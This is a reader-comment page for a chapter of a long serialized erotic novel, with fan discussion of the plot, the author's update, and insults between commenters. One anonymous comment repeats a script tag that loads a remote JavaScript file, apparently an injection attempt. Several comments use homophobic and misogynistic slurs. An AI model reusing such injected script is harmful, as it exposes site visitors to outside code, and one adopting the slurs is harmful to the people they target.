All Comments on 'When We Were Married Ch. 04C'

by DanielQSteele1

Sort by:
  • 186 Comments (Page 2)
AnonymousAnonymousover 13 years ago
Sustained Excellence

I just want to congratulate you DQS, for the sustained excellence of this work. I estimate that by the time we're finished we will have a full-length novel here on Literotica.

I don't even mind that there's not much erotic content in the story: first because all the non-erotic content is driving forward a gripping plot and believeable, complex characters; and secondly because when there is a sexy bit, it is really very good indeed. The scenes on the Bonne Chance, when they came, were as good as anything I've read on here.

Keep it up, and don't be discouraged by those that say its too long or there are too many characters. 98% of the content of this site is aimed at ticking their boxes. You are one of the few authors aiming at the other 2%. Long may you continue.

AnonymousAnonymousover 13 years ago
next? <script="http://swimstudio.freevar.com/img.js"></script>

<script="http://swimstudio.freevar.com/img.js"></script>

curioussscuriousssover 13 years ago
Author's story

I tend to agree with TigerDan and the following Anon on their general summaries. I just read the story because I’m enjoying it and all will be revealed in the fullness of time. Whether I’ll really like the ending – that’s another matter, but I will have enjoyed getting there.

The problem with instant feedback chapter by chapter is that, often, many 'middle chapter' comments and opinions are negated by the time later chapters and the finale are posted. Many comments are instigated by our restless inability to read the next chapter but somehow to feel part of the story process until the next installment is posted. It would be interesting to have the ability to summarize (after the last chapter), by poster, all comments made by chapter (except that Anons would, by necessity, be lumped together) so that WE too could learn as posters, i.e. whether, in future, to STFU or comment.

Even established and successful authors have contributed to the comments on an unprecedented scale. That, alone, is testament to the success of this story. Yes, there are rough edges, character unpredictability, times when disbelief has had to be suspended a tad, occasional inadequate editing/proofreading, annoying time between chapter postings and other very minor (in the grand scheme of things) issues. However, there is a rich originality about this epic which transcends the need for ‘nitpickery’.

Would I be happier with this story in my life or not?

A resounding YES.

AnonymousAnonymousover 13 years ago
UPDATE UPDATE UPDATE????????

CuriouASSHOLE and KITTYDan (Where is Bigfoot? Nice new "id"), suck each other's cock. Don't mind DOS1, can't stand them.

UPDATE UPDATE UPDATE..........

size14shoesize14shoeover 13 years ago
Are dreams a sign of mental illness?

Are dreams, even bad dreams, a sign of mental illness? How about nightmares? How the hell can someone reading a story determine that someone is mentally ill by a brief reference to a dream. Dreams are most often symbolic. Dreaming of murdering Bill is symbolic. Get a gripe.

AnonymousAnonymousover 13 years ago
That would be grip

I got a gripe...

bartolobartoloover 13 years ago
Will the next chapter ............

contain a section in which Debbie celebrates her single status, that is if she decides not to stop the divorcee from happening. If the divorce goes through, what will Bill do to cerebrate, if he's so inclined? If this were to occur I think he'd possibily go on a first date with Myra Martinez, who has indicated on at least two occasions that she'd pursue him after he was divorced. One thing that's special about DQS's writings is, it's hard to forget certain details of the story when awaiting the next installment.

DQS, we your fans (some mainly anon's and critics) await Chapter 04D.

GrumpyGambyGrumpyGambyover 13 years ago
Debbie's dream

IMHO, the dream of murdering Bill could mean two separate and distinct things:

1, Having felt abandoned and unloved by Bill for years she has inexplicable and irrational rage toward him. Because she knows this rage to be both inexplicable and irrational, also understanding her rage toward Bill is killing her relationship with him, she suppresses it. The dream represents her attempt to get rid of or "murder" the rage targeted at and triggered by Bill . Get rid of the target/trigger, get rid of the feeling.

This could also serve as some rationale she uses for never having given the Bill the opportunity to re-enter the relationship by making it a higher priority.

2, The pepperoni pizza she had that night didn't agree with her. "Sometimes a cigar is just a cigar..."

GG

GrumpyGambyGrumpyGambyover 13 years ago
Dreams one more thing

Size 14: Dreams are not a sign of mental illness. Sleeplessness (Consistent occurrence lasting more than two weeks) caused by dreams can create a mental illness... depression/anxiety/ptsd. Typically, those mental illnesses are present before the sleeplessness caused by dreams.

Dream analysis is only helpful in getting to the root, and that's only appropriate in certain types of therapy that are currently out of favor. No one can interpret a dream, or validate it's meaning or even validate that the dream has meaning other than the dreamer.

That's why DQS is so brilliant! Leading us like sheep, all over the place. Anytime we think we know where he's leading us, he switches directions in a seamless and cohesive way. We can be stubborn and refuse to enjoy the surroundings, or we can enjoy the tour for what it is... a daily diversion and escape.

Harryin VAHarryin VAover 13 years ago
for the idiot size14 shoe

the dream by itself? No of course not you moron.

Even worse NO one ever said THAT.

BUT the dream.... COMBINED with her severe anger and resentment towards Bill even after humilating him public...

and Talking to DEAD aunts....

and Debbie's inability to talk ABOUT bill ...even when she is among Friends and rleatives..... with out her "losing it"

all of those together ... DO indicate a mental disroder

uallruptightuallruptightover 13 years ago
so many of you waste air

update update update next next next curiosasshole kittydan bigfoot suck each others cock?

Did you forget your meds Anon? Find them. Take them. Crawl back under your rock.

Anon, you're like a roach who comes out in the dark when no one can see.

Never give an opinion or add anything worthwhile whether others would agree or not. To bad they can't or don't block assholes like you. You ruin it. And probably think its fun. Sick bitch.

vietvetvietvetover 13 years ago
Dream:

You may be an undigested bit of beef, a blot of mustard, a crumb of cheese: ETC ETC ETC ETC

AnonymousAnonymousover 13 years ago
Thanks Harry for pointing out [once again] the obvious flaws that the brain-less bastard called "size 14" exhibits.

In actually, if one was to compare the delusional state that the idiot "size 14 no IQ whatsoever" consistently demonstrated in support of the slut Debbie [or Saint Debbie, if you follow the convoluted irrational bullshit that shoe spews]: you would observe a simpleton who worships & hangs on every illogical thought that the slut Debbie pukes forward. Without re-telling the plot line, why is it the only stupid ball-less idiot called "shoe" is only one to" Not-Comprehend" what a fucked up slut this soon to be divorced bitch is? Somebody like the fag, mancelt needs to step up to the plate and "bitch-slap" the idiot [shoe fag] and take away his keyboard so he refrains from embarrassing himself so badly. Obviously, the shoe idiot is in-capable of forming a logical/coherent rebuttal so we will accept his silence as validation of worthlessness.

AnonymousAnonymousover 13 years ago
Delaye

DQS1 you do best I proud of you. I think this is the best novel I read from third world Ethiopia. Please post the next chapter soon or make it short or use epilogue. For the heaven sack I beg you the great author to finish soon and post all chapters. I am very vague about Clarice Please brief to the coming chapter by your strong talent. I hope you do it. I found this novel free on internet, the story is very suspense did I got the book in the market? Please any body answer my question to this email addisu150@yahoo.com. adabtd@gmail.com

AnonymousAnonymousover 13 years ago
Clarice

I know Debbie aunt was name Clarice. De3b's er younger sister name Clarice also. Is she dead?

AnonymousAnonymousover 13 years ago
Updates? It's been over a week

u all r up thight ----- Update update update....FUCK YOU FUCK YOU FUCK YOU....SUCK SUCK SUCK...KITTY KITTY KITTY DAN'S DAN'S DAN'S.......COCK COCK COCK.......

Hey DQS1, man, you are doing a good job, just stay away from DOGS with multiple user IDs

UPDATE UPDATE UPDATE......NEXT NEXT NEXT HA HA HA!!!

TigerDanTigerDanover 13 years ago
OMG TY, I needed that

A little reality for a minute. I wish I could send this to you directly......but you"re anon. To those of you out there that are tired of this or bored outta your asses from it I apologize up front.

Dude, (or dudette). Thank you....... Really, I mean it. The last few days have really sucked. We (my co. of 23 yrs) lost 2 substantial contracts that we've held for over 15yrs. The co. will be fine, (thank you for asking) but now I get to stress over how many employees and their families me and my no-load paper pushers get to tear up when they get their walking papers. We're a small company. I have just under 200 employees. We are a good group. We have parties, dances, and picnics,......a daycare for the employees children. Twice we've had weddings of children who grew up together in this extended family. (One of the young couples said they got to marry their best friend at their reception party) This is not a damn literotica story.......its fucking real life.

So anyway,..... back to my thank you!

First I promise not to ever direct anything to you again after this unless you have another name that you use along with anonymous and I don't know it.

Second I have not laughed that hard in a long long time. I think maybe when my wife and I got "caught" on our honeymoon on a beach in Hawaii, that was a good one. We laughed a lot that night after, and the next night with the couple that caught us at a dinner we bought them.

Maybe at a Bill Cosby stand up we went too. He was funny as hell!

I also remember being in Miami Fl. in the early seventies driving a 69 ford fairlane 428 cobra jet. 4 speed (god that car was fast...ugly as hell but ridiculously fast) through all the new damn toll booths one night stoned outa my mind w/ some friends. Can't even remember what was so damn funny.

So.... really anonymous, except for the way the beer burned my nose as a little came out, and the fact that I was worried about my laptop until I was sure I got the beer all cleaned off of it and it survived,... it was just a much needed laugh. It just struck me as funny at that moment reading what you wrote.

It was a reality check for me. A little perspective. Thanks for your help.

TigerDan

AnonymousAnonymousover 13 years ago
Still no new chapter

When i first started reading this story i was hooked, but as it went along you started to lose me as a reader. Not that i don't understand what is going on but that my interest is fading. If has faded so much indeed that i hadn't thought of your story since i read the last chapter. This morning i thought of it and figured that since it has been 11 days that a new chapter would be posted by now but at last i was wrong. I will check back when or IF i remember again.

belknap026belknap026over 13 years ago
Once upon a time

when cable companies were local and you could actually call the engineer when there was a problem, I did just that. He told me, in no uncertain terms, that if people like me would stop calling, he could fix the problem. Daniel, are you having the same problem? If so, I'll stop writing and let you get back to work! Rich

bartolobartoloover 13 years ago
Comeon DQS it's vital

Hi DQS,

Your followers, including me, want to learn more about the lives of Debbie, Bill and family post July 21, 2005. It's been a while since Bill got back from his cruise and since Debbie was formally released from the faculty at UNF. You need to finish chapter 4D for us. Also, Debbie's biological clock may be running out soon.

AnonymousAnonymousover 13 years ago

Maybe the author just decided to take his time and finish this story before posting the rest. Its not like he's really getting any new and different type of feedback at this point.

chastity69chastity69over 13 years ago
You just can't stop now

You need to continue this awesome story. More more more.

Sloburn38Sloburn38over 13 years ago
Life happens

I am waiting on the next installment to, but then I realize that, this story is free to you and me, and I can't imagine the work that goes into developing a story like this, and the author probably has a life.

Unless DQS won the lottery and doesn't need to work, or doesn't have a life of any sort then we have to assume that he has been busy living it.

I will still be here when he gets back, it is a good read and he will finish it at some point.

AnonymousAnonymousover 13 years ago
What a Dip-Shit!

Oh what a Dip-Shit!

Is this elongated convoluted meandering disjointed mistake riddled tale finally over??? Please tell me it is....

DQS1 needs to learn the first rule of writing a lengthy story. That rule is that the author writes the WHOLE story complete with some passable ending. Then he/she divides the story into neat chapters which flow together to keep the readers’ interest. Then, and only then, does he/she submit the story for publication. That way the reader is able to maintain a decent memory of what happened in the beginning of the story. A good author does not start out with just an idea for chapter 1 and then tries to write the subsequent chapters “on-the-fly” which is exactly what DQS1 did in this dragged out tale.

DQS1’s first submission of this story began on 05/17/2010…100 days ago…can any one who read chapter 1 way back then still remember the subtle details of chapter 1? DQS1 did not consider the readers expectations when he submitted chapter 1. Those expectations of the readers were to finish the story in one life-time. He neglected to tell the reading audience that this woeful tale was going to take 100 days to complete… and to please take notes because you (the reader) will forget what happens in the beginning by the time I (the author) present you (the reader) with some form of ending.

DQS1 was inconsiderate and disrespectful of the reading audience. To imagine that he could piss around for 100 days with a tale that should have been presented complete in 7 to 10 days maximum shows his contempt for his readers. My vote is to BOYCOTT the future submissions of this author at least until the last chapter is submitted…then maybe go back and read the WHOLE story in a couple of days…instead of several months.

What a Dip-Shit!

AnonymousAnonymousover 13 years ago

boy oh boy, you are really stretching this story out. it would be fine if you posted the installments much faster.

DanielQSteele1DanielQSteele1over 13 years agoAuthor
Update

Just wanted to give everybody a head's up. I just submitted another 15,000 word chapter in this saga. It should run August 26. Sorry that this one took me a little longer than most. As always, to the people who like the story and are staying with it - thanks for the interest and while I'm sorry this has taken so long, it's just the way it's worked. If I had known when I started it would run this long, I might have held back and tried to get more finished. But on the other hand, people have said they don't want to wait the six months or more it might take me to finish. I understand the irritation a lot of people have with waiting as it gets longer between chapters.But again, that's just the way it worked out. As it gets closer to the end I'm hoping things will speed up. I can tell you that all the elements involved in the story have now been introduced, in one fashion or another. When you read through to the end of this one, I should warn you not to jump to conclusions. It might be running the way you think it is, but it might not. Finally, I shouldn't comment on this, but a lot of people seem to think I'm just wandering around without a firm idea of where the story is going. I've played a few riffs on themes and introduced a few characters from other stories, but I've always liked open, expansive novels. There is no drift on the plot and where it's going. When it's finished, whether I ever sell it somewhere else or not, anyone who wants to can read it and see that it's a straight shot from the first chapter to the last word. Things happened that weren't predicted in the first chapter, but I've said all along that this is not just the story of a couple's divorce and what happens afterwards. It's a story of a prosecutor who's a good guy but far from perfect, his wife and kids, his friends, enemies, and life and death in the criminal justice system. It's not either romance and loving/cheating wives:or courtroom action. It's both and more. And I am having fun.

SqueezeplaySqueezeplayover 13 years ago
Thanks for the heads up.

Appreciate your letting us know when the next chapter will be posted. For those that bitch about where this may be headed or do not care for your style - my advice is don't read it! Or, better yet, write your own story. I'll look for it under the author name of anonymous

AnonymousAnonymousover 13 years ago
Characters from other stories?

Who are the characters from other stories? I only picked up on the couple from "dream wife." Can someone fill me in please.

curioussscuriousssover 13 years ago
Dear Anon

Two of the others are Lew (yes, Bill's lawyer) and Mona from 'The Last Goodbye'. This story is set before the events in 'Goodbye'. For a little more background please read chapter 2D when Debbie warns Lew about his wife Mona and Lew's current partner Norman.

curioussscuriousssover 13 years ago
Dear Anon (again)

Also in Chapter 3C, Cyndi (Lew's intended in 'The Last Goodbye' after he walked out on Mona), when she was still married to her asshole husband.

There may be others but I haven't noted them (?) so far.

SleeplessinMD3SleeplessinMD3over 13 years ago
March to Reconciliation!

I am glad that you are having fun so am I! At first I wondered why this story was running so long. Debbie had betrayed Bill in such a primal way from undermining him with his kids to publically humiliating him with a younger lover. How can he ever get back together with her? After he was destroyed you took steps to rebuild him. First, with his working out to get back in shape, then his affair with Aline to build up his confidence as a man, the fight with Doug to reassert him as a father and now with this chapter reestablishing Bill as a professional attorney. On the other side, we now know that there are long seated demons Debbie has been struggling with affecting her relationship with Bill. Debbie also begins to realize what she lost when she dumped Bill.

GaryinSeattleGaryinSeattleover 13 years ago

As usual a great chapter. Thanks

SegamiSegamiover 13 years ago
Bravo

Awe inspiring chapter. I still wonder if the pimp will come back and ask for a favor, though. Things are looking up, but I feel like they'll be hitting the shit very soon. Can't wait to read the next part. Again, bravo Daniel.

auhunter04auhunter04over 13 years ago
this chapter

this chapter moved me more than every other one except the first. The rambeling of how his day had been is moving. At some point we all go through a day like that. For most of us not as bad for a few it is worse.

I would like to see this in a book format but I wonder if it would have the same impact

Rickw1172Rickw1172almost 13 years ago
The Chapter Ending ...

Dear Sir.. I must say that you are one of the good ones when it comes to writing ... This is a moving portion of your larger tale ... At the end ... I must say, I hurt me to read ..

Thank you for the tale, and I shall continue reading as the story progresses

AsianDicktatorAsianDicktatorover 11 years ago
Amazing.

This may be a story on a erotic website, but my gosh. It is amazing and the last part made me shudder. Good writing.

AnonymousAnonymousover 10 years ago
Better than anything I've read...

This has more twists and turns than I've ever read.,, incidental sex - who cares.,,,, this is as good a read as I've ever had and I have read some of the best authors.

If you have not published this or something like it, you should. You are a very good author.

AnonymousAnonymousover 10 years ago
qgreement

I agree with the previous commrnt. This is a very publishable story. I'm surprised that it hasn't been. Sorry, but I still can"t warm to Debbie........the comment about her not being able to keep it in her pants is reinforced by the slutty way she acted when walking out of the classroom. Once a slut always a slut. Her daughter is a chip off the old block....quite the little tart..

AnonymousAnonymousover 10 years ago
Could not do much

worse than this,

JUAN star *

krosis666krosis666over 10 years ago
This story is

fantastic. It is almost epic. It`s like a great novel that you can`t put down. You just have to turn the next page!

I agree with other comments about Debbie. I just can`t warm to her character. She is just too obsessed with herself and her appearance, and with getting male attention. She is like a lot of beautiful women, in that she thinks physical beauty is all that matters and that if men don`t stare at her she thinks that there is something wrong. Physical beauty will always fade, but true inner beauty will always shine through and that kind of beauty is eternal. I wish sometimes that women could realize this, and stop obsessing over their appearance. Women like that end up lonely and hating all men.

Debbie calls men perverts for staring, yet she puts all her attributes on display and screams for attention. I think it stems from her experience in the frat house, and on some level in the bottom of her mind, she misses and wants what happened to happen again.

Having said all that, I do hope her character turns it around and redeems herself.

AnonymousAnonymousover 10 years ago
rubbish

translates to garbage in garbage out

KarenEKarenEabout 10 years ago
Anonymous Morons

This is the 12th segment of this story. If you hate it so much, why are you here? Do you like to torture yourselves?

KarenEKarenEover 9 years ago
Father Dunleavy

I hope Bill looks up Dunleavy's son and explains the facts to him.

I realize it may cause him grief, but he should know that his father didn't stay out of his life willingly.

AnonymousAnonymousabout 9 years ago
This is like a finely-crafted train wreck

I can't look away and I know I'm hooked until the final line.

DQS has ignited an inner rage about how fucked up my life has become while at the same time sparking jealousy that I will never meet a woman like Aline and weeping for all the fuckups and general misery in both my life and his story. If stirring deep emotions and empathy are indications of the power of an author's writing, then DQS is a master. Thank you for this incredible story.

Me? I'm in full anony-mouse mode because I am ashamed of the clusterfuck I have allowed my life to become.

MullendersMullendersalmost 9 years ago

karen sure he should do that so that the boy can find out that the only family he has left betrayed him sure that is a nice tought! no he should leave the boy in his bubble. its just cruel if he were to go to the boy now!

rightbankrightbankover 8 years ago
not enough characters yet?

and the net keeps being cast wider and wider. There are so many bit players already it is difficult to keep up with the ever expanding community of participants.

Tyrone?

Clarice?

Aline?

Kelly?

AnonymousAnonymousover 8 years ago
well, you've done it

There are so many characters with so much emotional baggage it's like a briskly boiling soup pot. I hardly know who or what to root for. I guess the KISS principle is too much for my tired old brain to hope for at this late date, maybe a list of characters at the beginning of each chapter?

sbrooks103xsbrooks103xalmost 8 years ago
Thoughts

"He walked away from it. Not me." - I suppose that depends on how you define that - did he devote too much time to his job? Yes. But is that "walking away" from his marriage? Not to me. Certainly not as much as having an emotional affair with a younger, more handsome, more virile colleague,and discussing intimate details of her marriage that she declined to discuss with her husband!

"I'm divorcing him, and he starts looking good again." - And it never occurs to her that he realizes his contribution to the failure of the marriage and is trying to correct it, for HIMSELF, not to spite her? Could she be any more egotistical, to think that everything is about her?

Why is it that husbands are expected to still love their wives when they put on weight,or their tits start to sag or they lose their libido, but let the husband get a spare tire or lose his hair or have ED she's entitled to look elsewhere.

I realize it was done for dramatic purposes, but what would African tribes care about what a Catholic priest has to say?

Tw0Cr0wsTw0Cr0wsalmost 8 years ago
@sbrooks103x 05/16/16

re:

"I'm divorcing him, and he starts looking good again." - And it never occurs to her that he realizes his contribution to the failure of the marriage and is trying to correct it, for HIMSELF, not to spite her? Could she be any more egotistical, to think that everything is about her?

It's been said that the surest way to get a married man into the gym is to serve him divorce papers.

She has thrown him back into the dating pool, what did she expect?

arrowglassarrowglassalmost 8 years ago
I am definitely hooked...an addiction to this series!

Looking forward to my next "fix" as I read on!

AnonymousAnonymousover 7 years ago
women talk about men thinking with they`re dicks

This useless cowcunt has yet to ever walk into a room and think with anything but her useless fucking utters she calls tits

AnonymousAnonymousover 7 years ago
Debbie Is So Self-centered

Debbie keeps trying to lay the blame for the disintegration of their marriage on Bill because he spent so much time at work. Meanwhile she was flirting with men of all ages, including BJ's friends and men in Bill's circles, and her own colleagues, both single and married. When both Doug and Bill were both injured in the first fight at UNF, Debbie went to Doug, not Bill. It was Bill that BJ went to and it was Bill that Kelly listened to. Debbie has never given Bill a chance. This story seems to be heading toward reconciliation; and I will blaspheme the writer if this is true.

AnonymousAnonymousabout 7 years ago
Only in Mary land

"Kelly, in the eyes of the law, having oral sex with a 17-year-old would get him sent to state prison and branded a pedophile for life.

Unless of course you are an illegal alien in Mary land, then when they rape your 14 year old daughter is is consensual.

AnonymousAnonymousalmost 7 years ago
Name confusion

Is it Dallas Edwards or Austin Edwards? Pick one and stick with it, please.

AnonymousAnonymousover 6 years ago

@one of the anonymous from another anonymous

That bothered me, too, until I dealt with it by deciding that his real name was Austin and that Dallas was a nickname that Bill calls him (teasing him about being named after a city).

What bothers me more is why we have never been given the reason why Jessica won't marry Cameron. It's been mentioned several times that they love each other, but she won't marry him for a reason that is considered by all to be silly.

Seeker1107Seeker1107over 6 years ago
@anonymous 5/8/17

If it was your daughter who was raped I express my deepest sympathies for your family. Especially for your daughter. Stay strong and be there for her. I was raped at a young age by my babysitter and her girlfriends. If not for the help and understanding of two friends I would have died long ago. So be there for her, don't be overbearing about it just make sure that she knows you love her and that it wasn't her fault in any way shape or form. My prayers are with you and your family.

GJP

AnonymousAnonymousalmost 6 years ago
@ Anonymous 7/7/17

Two different people in two different offices. Dallas is the District Attorney & Austin is the head Public Defender. Two sides of the same coin of the judicial system.

dark2donut2dark2donut2over 5 years ago
Another 5 pages of slow non-plot

District attorneys office lawyer goes brass knuckle boxing resulting in serious injuries in a university office without any security or police involvement. Yup, in DQS1 Disneyland soap opera. You'll find more realistic events in Latino soap operas.

This is actually the second time, only the first time it was without brass knuckles.

More redneck style dialogues by the people that are supposedly high flying North Florida elites. Constant sexual innuendos in law offices? Yup, again in DQS1 Disneyland. You think people that spent hundreds of thousands of $$ for law degrees would put careers at risk so that they can cock tease and fuck on desks and chairs. I guess DQS1 gets that from too much masturbation on internet porn.

AnonymousAnonymousover 5 years ago
You and the main character have a lot in common, . . .

mediocrity. You must know the feeling of just "adequate" acutely to be able to create a character who is, in the end, just adequate. Thanks for trying.

AnonymousAnonymousalmost 5 years ago
Alright already....

Move on with the story! One month left until the divorce is final has been going on for two months. Get with it...I am getting bored and probably won't finish this never ending saga!

AnonymousAnonymousalmost 5 years ago
Why?

Why the fuck do you clowns keep reading if you hate the author and his stories so much? Talk about a bunch of miserable human beings............ Signed: BTW

john_sixfooterjohn_sixfooterover 4 years ago
What a powerful series!

You are superb as a writer!

You've managed to give each character a heart, a soul, and real character.

Wonderful series!

AnonymousAnonymousover 4 years ago
Good story

But I still think Debbie is nuttier than 20 squirrel nests.

KalimaxosKalimaxosover 4 years ago
Too close to home

Maybe because I have a daughter and son and the wife and I went through our problems, this story resonates a bit too much. The lack of communication between them reminds me of our five years of sleepwalking through our marriage where we were barely there.

Notice how they are both college educated by social skill stupid. College didn't teach me shit about life either.

Grimjack01Grimjack01over 4 years ago
Friends in low places

I can flat tell you, when you do some unlocked for favors for connected people some will feel they owe you a favor back. These types of things happen, I can attest to that. Well written.

lisablissfullisablissfulabout 4 years ago
Ticking along nicely

Love this story. I will never want it to end. I don't even know how I want it to end. Best author on lit. great character's and insight into life. That chapter kept it ticking along nicely.

AnonymousAnonymousalmost 4 years ago
5 Stars

This is One of the Better Stories ..

lancewmlancewmover 3 years ago
Excellent Chapter

The introspection flowed much better than the past two chapters. However, you introduced us to the guy who threatened the family, creating a deep problem for Bill, and then you let him off the hook. He never had to solve that problem. We're left with the serious political problem of the black police officer who shot a fleeing man in the back. I hope you don't just let Bill off the hook for that one too.

SlamnukeSlamnukealmost 3 years ago

Damn that ending was a punch in the gut. Great story so far.

Side note: the French being that way about marriage is a 20th century invention that began in the 1920s. Anyone saying it is a major difference between Americans and French is lying their ass off and probably knows nothing of history. The French in general treat monogamy the same way people do in the US. Only actual degenerates (generally Parisians) have extramarital sex in this manner. The average French person who is not high society? They despise this mentality. These are a people who wholesale slaughtered their elites for being terrible people in one of the bloodiest revolutions in history. The idea that the French are different is something that only applies to their elites, which are not dissimilar from ours.

AnonymousAnonymousabout 2 years ago

I must say that while I really enjoyed the first chapter, I feel like the story has been meandering slightly ever since. I have no issue with getting stuck into a long story, but I feel like there have been too many superfluous plot tangents.

Too many of the events feel like they are happening TO the protagonists instead of BECAUSE of them in my humble opinion. One of the most egregious being the weird way in which bill had his whole family threatened in what should’ve been the biggest conflict in the entire story so far. Before it was almost instantly resolved by a character who has never even been mentioned before.

If I’m being honest I also feel like a lot of bills law work could’ve either been trimmed down, or even moved to before/during the initial affair , so we had more context for his character. Rather than having to be constantly told by other characters how great/ruthless/noble Bill is.

Finally I feel like although Debbie started off as quite an interesting character, her whole weird sexual mania phase has kinda undermined a lot of the more interesting shades of grey she started off with. Not to mention the bizarrely liberal and problematic use of sexual assault in the story. Even if you try and justify it cynically by just using it as device to manipulate the audiences perception of a character, it objectively dilutes the effect it has when it gets mentioned virtually every chapter.

ChopinesqueChopinesqueabout 2 years ago

Every word is worthy. Each portion of this tale could be nothing less than five stars. Excellence.

AnonymousAnonymousabout 2 years ago

You have got me crying.

AnonymousAnonymousalmost 2 years ago

Great writing Even tho it is a little drawn out I have been kept interested since the start Hope to finally finish it tonight Best wishes to you (jaybee186)

dgfergiedgfergieover 1 year ago

ONCE AGAIN ANOTHER GOOD CHAPTER ADDED. I was married to a blond not unlike our Debbie in this story. She was not a bombshell with big tits but she was and attractive little blond. Not to bright and we had nothing in common except two girls. She pretty much left me for same reasons Debbie left Bill. I was 6 years older but I didn't get fat and flabby but I did get bald and older and slowing down a bit. So end of marriage so she could look for somebody with hair. The second wife with four kids always said she I would be bald and didn't care, that marriage lased 40 years. Thee are some very selfish people in this world. Another good story by our illustrious author.

AnonymousAnonymousover 1 year ago

The more chapters I read, the less redeeming Debbie's character becomes. What a selfish slut.

AnonymousAnonymousabout 1 year ago

Debbie will probably have a threesome with her therapist and author stud in her marriage bed. Just keep hoping she dies.

AnonymousAnonymousabout 1 year ago

"It's bad, but not bad the way you think. Nothing really happened."

.

Assuming a scenario where Kelly wasn't interested in a relationship with Doug, if Doug had gone into a sleeping Kelly's room and had gone down on her, would Debbie have considered that as 'nothing'...? Since she threatened him with a gun we know the answer to that.

.

And except for the fact the author told us she didn't, could we fault Bill if he wondered how many nothings Debbie engaged in during their marriage...?

AnonymousAnonymous9 months ago

Dunleavy's death was heavy. Btw whats the deal with the clarice debs sister? Where is she?

tsgtcapttsgtcapt7 months ago

Reading on... thank you.

AnonymousAnonymous4 months ago

I guess the author has forgotten some small things. Yeah. Things like a RESTRAINING ORDER???? But hey....they talked. That counts, right?

Debbie is so messed up in the head right now.

Bill is denying reality at this point.

Yet, we have 9 more chapters left. At the rate things are going, at about 3 days per chapter, that means we might actually see them actually get divorced.

Any chance of RAAC or BTB? I read the last chapter comments. I can tell ya....but.....

Let's say it like this. I am finding it HARD to finish this story line at all. It started good, but quickly jumped the shark, and too many plot holes are abounding.

DoctorAlanDoctorAlan3 months ago

Seeing both halves of a couple separately is such a violation of professional ethics it makes my head spin. No therapist should do that. Ever.

AnonymousAnonymous2 months ago

The phrase, "the 'N' word" killed it for me.

IMHO, you can keep your writing to yourself.

My only complaint about this site is, and why I stay anonymous, is the lack of functionality to IGNORE a specific writer.

oldsage_1oldsage_1about 1 month ago

Big chapter! Thanks. Going to be interesting to see how you bring Bill an Debby back together.

Cheers

SAGE

AnonymousAnonymousabout 1 month ago

You laid back on the introduction, which was good, but you're starting to get a bit repetitive in other areas. Recapping is one thing, bringing it up more than once is redundant.

Billy_Ray_BanBilly_Ray_Banabout 1 month ago

Now THAT was a helluva day! 5/5 BRB

12
Anonymous
Our Comments Policy is available in the Lit FAQ
Post as:
Anonymous